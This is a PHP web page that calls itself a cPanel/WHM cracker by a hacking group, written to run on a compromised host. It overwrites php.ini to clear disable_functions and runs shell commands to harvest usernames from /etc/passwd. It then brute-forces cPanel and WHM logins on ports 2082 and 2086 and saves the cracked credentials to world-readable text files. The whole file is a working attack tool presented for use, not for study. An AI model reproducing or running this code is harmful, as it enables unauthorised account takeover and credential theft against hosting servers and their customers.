WhmCracker

<title>--==[[RR CPanel/WHM cracker by Team InidiShell]]==--</title>
<body bgcolor=black>
    <p h3 style="text-align:center"><div align=center><table   width=100%><tr><td align=center>
    <font size=6 color=white face="comic sans ms"> RR</font><font size=5 color=white face="comic sans ms"> CPanel/WHM</font><font size=5 color=white face="comic sans ms"> cracker By </font><font size=5 color=white face="comic sans ms">Team IndiShell</font><font size=6 color=white face="comic sans ms"></font>
    <br><font
        color="red" face="comic sans ms"size="1">
      <font color=white><b>-==[[Greetz to]]==--</font><br> <font color=red size=-2>  Guru ji zero ,code breaker ica, Aasim shaikh, Raman kumar rana,INX_r0ot,Darkwolf indishell, Chinmay Pandya ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell<br>cool toad,cool shavik, Ebin V Thomas,Dinelson Amine ,Mr. Trojan,rad paul,Godzila,mike waals,Neo hacker ICA, Golden boy INDIA,Ketan Singh,Yash,Reborn India,Alicks,Aneesh Dogra,silent hacker,lovetherisk<br>Suriya Prakash,cyber gladiator,Ashell india,Cyber Ace,hero,Minhal Mehdi ,Raj bhai ji,cold fire hacker,Prashant Tanwar, VikAs ViKi ,Rakesh, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand,Bhuppi and rest of TEAM INDISHELL<br>

<font color=white>--==[[Dedicated to]]==--</font>
<br># SH.Kishan Singh Tanwar and my Ex Teacher Mrs. Ritu Tomer Rathi #</table>

           </table><div align=center><font color=white size=4 face='comic sans ms'>>>>&nbsp<a href="<?php echo '?ini'; ?>"><font color=white size=3>rUn php.1n1 first of 4ll</b></font></a><font color=white size=4 face='comic sans ms'>&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<a href="<?php echo '?/var/mail'; ?>"><font color=white size=3>Us3rN4m3 ExTracTor</font></a>&nbsp&nbsp&nbsp&nbsp<?php

               $r=gethostbyname($_SERVER["HTTP_HOST"]);
               $s="<a href=http://".$r.":2082><font color=white size=4 face='comic sans ms'>link for cpanel login</a>";
               echo $s;
                          ?>&nbsp<<<<br>


    <?php

if(isset($_GET['ini']))
{
    $r=@fopen('php.ini',w);
    $s=" disable_functions =none ";
    $t=@fwrite($r,$s);

echo "<p><a href=php.ini><font color=white size=4 face='comic sans ms'>link  to php.ini</a>";

    }

?>
<?php
if(isset($_GET['/var/mail']))
{

?> <form method=post><textarea style="background:black;color:white" name=pass rows=20 cols=20 ><?php
$r="cat /etc/passwd | cut -d \":\" -f 1";
echo shell_exec($r); ?></textarea><br><input type=submit name=subm value="click to copy all usernames to username filed" /></form>
<?php
}
?>
<form method=post><div align=center><font color=red size=3 face='comic sans ms'>/--------------------------------------------\<br></font><div align=center><font color=white size=3 face='comic sans ms'>&nbsp{&nbsp&nbsp&nbsp Usernames&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp Passwords &nbsp&nbsp&nbsp&nbsp&nbsp }</font>
</table><br><div align=center><font color=green size=3 face='comic sans ms'>\-------------------------------------------/</font><br><table><font color=white size=3 face="comic sans ms">Attack =><select name="op">
<option name="op" value="cp">CPanel</option>
<option name="op" value="whm">WHMPanel</option></table><br>
<?php
if(isset($_POST['subm']))
{
    $pa=$_POST["pass"];
?>
<textarea style="background:black;color:white" rows=25 cols=25 name=usernames  ><?php echo $pa; ?></textarea>
<?php
}
else{
    ?>
    <textarea style="background:black;color:white" rows=25 cols=25 name=usernames ></textarea>

<?php   }

?>

&nbsp <textarea style="background:black;color:white" rows=25 cols=25 name=passwords></textarea><br><br>
<input type=submit name=cracking value="lets hex this shit XD" /></form><br>
<?php
error_reporting(0);
$connect_timeout=5;
set_time_limit(0);
$submit=$_POST['submit'];
$userl=$_POST['usernames'];
$passl=$_POST['passwords'];
$attack=$_POST['op'];
$target = "localhost";
if(isset($_POST['cracking']))
{
    if($userl!=="" && $passl!=="")
{
if($_POST["op"]=="cp")
{
    @fopen('cracked_cpanel.txt','a');
    echo "bhai ji ^_^ ......now we are attacking cpanels....please wait till the end of process \n";
    echo "<p><a href=cracked_cpanel.txt><font color=white size=2 face='comic sans ms'>here is link for file, which will store Cracked cpanel usernames with passwords </font></a></p><br>";

    }
    elseif($_POST["op"]=="whm")
{
    @fopen('cracked_whm.txt','a');
    echo "bhai ji ^_^ ......now we are attacking WHM panel....please wait till the end of process";
    echo "<p><a href=cracked_whm.txt><font color=white size=2 face='comic sans ms'>here is link for file, which will store Cracked whm usernames with passwords </font></a></p><br>";
    }

function cpanel($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 0 ){
echo "<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";
$x=$user." ".$pass ." \n" ;
$y=@fopen('cracked_cpanel.txt','a+');
@fwrite($y,$x);

}

curl_close($ch);}

$userlist=explode("\n",$userl);
$passlist=explode("\n",$passl);

foreach ($userlist as $user) {
$finaluser = trim($user);
foreach ($passlist as $password ) {
$finalpass = trim($password);

if ($attack == "cp")
{
    echo "<table width=80% ><tr><td align=center><b><font color=red size=1>Attacking user $user with password $password </font></td></tr></table>";
cpanel($target,$finaluser,$finalpass,$connect_timeout);

}
}

}

function whm($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2086");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 0 ){
echo "<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";

$x=$user." ".$pass ." \n" ;
$y=@fopen('cracked_whm.txt','a+');
@fwrite($y,$x);


}


curl_close($ch);}
$userlist=explode("\n",$userl);
$passlist=explode("\n",$passl);

foreach ($userlist as $user) {
$finaluser = trim($user);
foreach ($passlist as $password ) {
$finalpass = trim($password);

if ($attack == "whm")
{
    echo "<table width=80% ><tr><td align=center><b><font color=white size=2>user under attack is $user </font></td></tr></table>";
whm($target,$finaluser,$finalpass,$connect_timeout);
}
}
}
}
elseif($userl=="")
{
    echo "what are you doing bhai ji :( , you have left userlist field empty";

    }
    elseif($passl=="")
    {

        echo "bhai ji :( ... please put passwords in paasword list field";
        }
}
?>